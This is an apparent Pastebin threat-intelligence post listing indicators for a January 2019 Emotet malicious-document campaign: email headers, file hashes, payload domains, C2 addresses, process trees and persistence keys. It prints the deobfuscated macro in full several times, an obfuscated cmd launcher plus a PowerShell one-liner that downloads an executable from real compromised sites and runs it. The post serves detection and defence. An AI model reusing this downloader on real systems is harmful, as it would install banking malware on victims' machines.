SHARE
TWEET

#emotet_230119

VRad Jan 25th, 2019 (edited) 409 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #IOC #OptiData #VR #emotet #feodo #banker #xml #powershell
  2.  
  3. https://pastebin.com/D9TDts5J
  4.  
  5. previous contact:
  6. 20/12/18        https://pastebin.com/EejcbL4t
  7. 04/12/18        https://pastebin.com/znQDtbnt  
  8. 09/11/18        https://pastebin.com/THHMs2wg
  9. 01/10/18        https://pastebin.com/Y6DnbpHv
  10.  
  11. FAQ:
  12. https://twitter.com/dvk01uk/status/1087660817452011520
  13. https://pastebin.com/g8gMJKui
  14. https://radetskiy.wordpress.com/2018/10/19/ioc_emotet_011018/
  15. https://kc.mcafee.com/corporate/index?page=content&id=KB90108
  16.  
  17. attack_vector
  18. --------------
  19. email attach .doc (XML) > macro > cmd > powershell_v5(!) > GET 5 URL > %temp%\***.exe
  20.  
  21. email_headers
  22. --------------
  23. Received: from ded1262.inmotionhosting.com (ded1262.inmotionhosting.com [173.247.255.190])
  24.     by srv8.victim1.com (8.15.2/8.15.2) for <user0@org7.victim1.com>;
  25.     Thu, 24 Jan 2019 07:33:34 +0200 (EET)
  26.     (envelope-from jonathan.contreras@grupodecme.com.mx)
  27. Received: from [104.152.233.226] (port=53273 helo=10.15.58.80)
  28.     by ded1262.inmotionhosting.com with esmtpsa
  29.     (envelope-from <jonathan.contreras@grupodecme.com.mx>)
  30.     for user0@org7.victim1.com;
  31.     Wed, 23 Jan 2019 07:49:42 -0800
  32. Date: Wed, 23 Jan 2019 07:49:38 -0800
  33. From: С ув.Андрей Сикорский 066-105-91-55,093-992-66-84 b2motor.com <jonathan.contreras@grupodecme.com.mx>
  34. To: user0@org7.victim1.com
  35. Subject: Aw: Outstanding INVOICE XPAHS/2921629/1194
  36.  
  37. files
  38. --------------
  39. SHA-256 339c428878402bf90c1ff0653d51626cfa6adff27a13adf75a42ed26d138b59f
  40. File name   FILE-T00978774.doc
  41. File size   258.31 KB
  42.  
  43. SHA-256 1e95b89a23fc36786d336b4bfd4c0a6fb84630bb62e34270da6b604fd9bf7d8a
  44. File name   aBQ0J3QEI0nmVgZS0xq.exe [from galvanengenharia.com 1st]
  45. File size   229.5 KB
  46.  
  47. SHA-256 f8e3c1cf0eafcbd54f0e26dbb7ca108a0a3f3a97546504af8a9e03ee75949189
  48. File name   XisJxx7N143.exe         [from imarketsforextrading.com]
  49. File size   238.5 KB
  50.  
  51. SHA-256 829c9c9d7d1f238e97bd3307392dad0f1537906505b694f1199ec9ddbee3bd52
  52. File name   f76rt7cruttl6.exe       [from galvanengenharia.com 2nd]
  53. File size   242 KB
  54.  
  55. activity
  56. **************
  57.  
  58. powershell
  59. powershtll
  60.  
  61. deobfuscated_macro
  62. --------------
  63. command: powershell $ntij='vcshw';$fkkv=new-object Net.WebClient;$jrpoz='imarketsforextrading{.} com/vpFtztlmbWLmXZWL@gencbafralilar{.} com/wp-admin/css/MSTealncf2Y_JI@north-bear{.} ru/SLiZjYZC4ZYAVon@galvanengenharia{.} com/NLuJg0pMQ6qrvYd4G_c0@nancybrouwer{.} nl/D8LOhbAH25ha'.Split('@');$qsqp='iowi';$bddaq = '168';$cuvfr='vwlui';$jbbj=$env:temp+'\'+$bddaq+'.exe';foreach($douz in $jrpoz){try{$fkkv.DownloadFile($douz, $jbbj);$ijqu='acino';If ((Get-Item $jbbj).length -ge 40000) {Invoke-Item $jbbj;$qpop='psah';break;}}catch{}}$zwpth='ibah';
  64.  
  65. pl_src:     1/5
  66. --------------
  67. imarketsforextrading{.} com/vpFtztlmbWLmXZWL/       not_downld
  68. gencbafralilar{.} com/wp-admin/css/MSTealncf2Y_JI   404
  69. north-bear{.} ru/SLiZjYZC4ZYAVon                    503
  70. galvanengenharia{.} com/NLuJg0pMQ6qrvYd4G_c0/       200
  71. nancybrouwer{.} nl/D8LOhbAH25ha                     blocked
  72.  
  73. C2:
  74. --------------
  75. 182.180.170.72:22
  76. 189.253.39.50:8080
  77.  
  78. netwrk
  79. --------------
  80. 104.225.130.135 www.imarketsforextrading.com    GET /vpFtztlmbWLmXZWL           HTTP/1.1    noUA
  81. 5.250.241.110   gencbafralilar.com              GET /wp-admin/css/MSTealncf2Y_JI HTTP/1.1   noUA
  82. 92.53.114.3     north-bear.ru                   GET /SLiZjYZC4ZYAVon            HTTP/1.1    noUA
  83. 191.6.205.20    galvanengenharia.com            GET /NLuJg0pMQ6qrvYd4G_c0       HTTP/1.1    noUA
  84. 189.253.39.50   189.253.39.50:8080              GET /                           HTTP/1.1    Mozilla/4.0
  85.  
  86. comp
  87. --------------
  88. powershtll.exe  1152    104.225.130.135 80  ESTABLISHED
  89. powershtll.exe  1152    5.250.241.110   80  ESTABLISHED
  90. powershtll.exe  1152    92.53.114.3     80  ESTABLISHED
  91. powershtll.exe  1152    191.6.205.20    80  ESTABLISHED
  92.  
  93. turnedbased.exe 2488    182.180.170.72  22  SYN_SENT                                       
  94. turnedbased.exe 2488    189.253.39.50   8080    ESTABLISHED
  95.  
  96. proc
  97. --------------
  98. c:\rjbv\qwqqb\mclaw\..\..\..\windows\system32\cmd.exe  /c CmD /V:/C"set 78QN=Ue%x5FNB4D':drkCP@u{(XinhY$.byo1pq_)Ac6ETS3vH2V0+g,~ZGOQa=J z\l-wjL}/tf;m8MWIs&&for %X in (...)do set p0QM=!p0QM!!78QN:~%X,1!&&if %X gtr 78 echo !p0QM:~6!|FOR /F "tokens=2 delims==fkCg" %e IN ('assoc.cmd')DO %e "  
  99. CmD  /V:/C"set 78QN=Ue%x5FNB4D':drkCP@u{(XinhY$.byo1pq_)Ac6ETS3vH2V0+g,~ZGOQa=J z\l-wjL}/tf;m8MWIs&&for %X in (...)do set p0QM=!p0QM!!78QN:~%X,1!&&if %X gtr 78 echo !p0QM:~6!|FOR /F "tokens=2 delims==fkCg" %e IN ('assoc.cmd')DO %e "  
  100. C:\Windows\system32\cmd.exe  /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $ntij='vcshw';$fkkv=new-object Net.WebClient;$jrpoz='http://www.imarketsforextrading.com/vpFtztlmbWLmXZWL@http://gencbafralilar.com/wp-admin/css/MSTealncf2Y_JI@http://north-bear.ru/SLiZjYZC4ZYAVon@http://galvanengenharia.com/NLuJg0pMQ6qrvYd4G_c0@http://nancybrouwer.nl/D8LOhbAH25ha'.Split('@');$qsqp='iowi';$bddaq = '168';$cuvfr='vwlui';$jbbj=$env:temp+'\'+$bddaq+'.exe';foreach($douz in $jrpoz){try{$fkkv.DownloadFile($douz, $jbbj);$ijqu='acino';If ((Get-Item $jbbj).length -ge 40000) {Invoke-Item $jbbj;$qpop='psah';break;}}catch{}}$zwpth='ibah';"
  101. C:\Windows\system32\cmd.exe  /S /D /c" FOR /F "tokens=2 delims==fkCg" %e IN ('assoc.cmd') DO %e   "
  102. C:\Windows\system32\cmd.exe /c assoc.cmd
  103. cmd
  104. powershtll  $ntij='vcshw';$fkkv=new-object Net.WebClient;$jrpoz='http://www.imarketsforextrading.com/vpFtztlmbWLmXZWL@http://gencbafralilar.com/wp-admin/css/MSTealncf2Y_JI@http://north-bear.ru/SLiZjYZC4ZYAVon@http://galvanengenharia.com/NLuJg0pMQ6qrvYd4G_c0@http://nancybrouwer.nl/D8LOhbAH25ha'.Split('@');$qsqp='iowi';$bddaq = '168';$cuvfr='vwlui';$jbbj=$env:temp+'\'+$bddaq+'.exe';foreach($douz in $jrpoz){try{$fkkv.DownloadFile($douz, $jbbj);$ijqu='acino';If ((Get-Item $jbbj).length -ge 40000) {Invoke-Item $jbbj;$qpop='psah';break;}}catch{}}$zwpth='ibah';
  105. C:\tmp\168.exe
  106. C:\Users\operator\AppData\Local\turnedbased\turnedbased.exe
  107.  
  108. (old)
  109. "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
  110. c:\rjbv\qwqqb\mclaw\..\..\..\windows\system32\cmd.exe .... gtr 78 echo !p0QM:~6!|FOR /F "tokens=2 delims==fkCg" %e IN ('assoc.cmd')DO %e "
  111. CmD  /V:/C"set 78QN=Ue%x5FNB4D':drkCP@u... gtr 78 echo !p0QM:~6!|FOR /F "tokens=2 delims==fkCg" %e IN ('assoc.cmd')DO %e "
  112. C:\Windows\system32\cmd.exe  /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll ...
  113. C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=2 delims==fkCg" %e IN ('assoc.cmd') DO %e "
  114. C:\Windows\system32\cmd.exe /c assoc.cmd
  115. C:\Windows\system32\cmd.exe powershell $ntij='vcshw';$fkkv=new-object Net.WebClient;... $jbbj=$env:temp+'\'+$bddaq+'.exe';... {Invoke-Item $jbbj;$qpop='psah';break;}}catch{}}$zwpth='ibah';  
  116. "C:\Users\operator\AppData\Local\Temp\168.exe"
  117. "C:\Users\operator\AppData\Local\Temp\168.exe"
  118. "C:\Users\operator\AppData\Local\wabmetagen\wabmetagen.exe"
  119. "C:\Users\operator\AppData\Local\wabmetagen\wabmetagen.exe"  
  120.  
  121. persist
  122. --------------
  123. HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run              25.01.2019 14:39   
  124. turnedbased 3dfxTools Common Library    3dfx Interactive, Inc. 
  125. c:\users\operator\appdata\local\turnedbased\turnedbased.exe 25.01.2019 22:40   
  126.  
  127. drop
  128. --------------
  129. C:\tmp\168.exe
  130. C:\Users\operator\AppData\Local\turnedbased\turnedbased.exe
  131.  
  132. # # #
  133. https://www.virustotal.com/#/file/339c428878402bf90c1ff0653d51626cfa6adff27a13adf75a42ed26d138b59f/details
  134.  
  135. https://www.virustotal.com/#/file/1e95b89a23fc36786d336b4bfd4c0a6fb84630bb62e34270da6b604fd9bf7d8a/details
  136. https://analyze.intezer.com/#/analyses/af88b324-e56b-4fd1-a8af-25a97d0163f2
  137.  
  138. https://www.virustotal.com/#/file/f8e3c1cf0eafcbd54f0e26dbb7ca108a0a3f3a97546504af8a9e03ee75949189/details
  139. https://analyze.intezer.com/#/analyses/20ce9259-1f35-41b9-8eb1-7d1408865a77
  140.  
  141. https://www.virustotal.com/#/file/829c9c9d7d1f238e97bd3307392dad0f1537906505b694f1199ec9ddbee3bd52/details
  142. https://analyze.intezer.com/#/analyses/200c4e09-f2ea-42c2-a803-1f98537d92af
  143.  
  144. VR
  145.  
  146. @
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top